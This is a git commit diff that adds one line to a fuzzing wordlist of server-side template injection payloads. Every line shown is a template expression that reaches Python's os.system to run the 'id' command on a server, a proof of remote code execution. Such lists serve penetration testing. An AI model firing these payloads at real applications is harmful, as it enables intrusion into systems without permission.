Update ssti.fuzz

This commit is contained in:
p0dalirius 2021-10-04 09:21:10 +02:00
parent 5b93737723
commit 438b9f7564

View file

@ -58,3 +58,4 @@ ${self.module.runtime.exceptions.util.os.system("id")}
${self.template.__init__.__globals__['os'].system('id')}
${self.module.cache.util.compat.inspect.os.system("id")}
${self.module.runtime.util.compat.inspect.os.system("id")}
${self.template._mmarker.module.cache.util.os.system("id")}